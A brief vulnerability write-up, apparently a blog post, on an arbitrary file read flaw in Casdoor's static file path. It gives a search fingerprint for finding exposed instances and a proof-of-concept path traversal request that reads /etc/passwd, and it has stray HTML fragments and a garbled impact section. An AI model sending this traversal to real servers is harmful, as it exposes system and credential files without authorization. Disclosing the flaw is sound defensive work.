Casdoor Static Arbitrary File Reading Vulnerability
Casdoor Static Arbitrary File Reading Vulnerability
Casdoor static Arbitrary file reading vulnerability
Vulnerability Description
Casdoor static There is a vulnerability to read arbitrary file. Attackers can obtain sensitive files in the server by sending special request packets.
Vulnerability Impact
Casdoor </a-checkbox>
Network surveying and mapping
title=”Casdoor” </a-checkbox>
Vulnerability reappears
Login page
Verify POC
/static/../../../../../../../../../../../etc/passwd
This post is licensed under CC BY 4.0 by the author.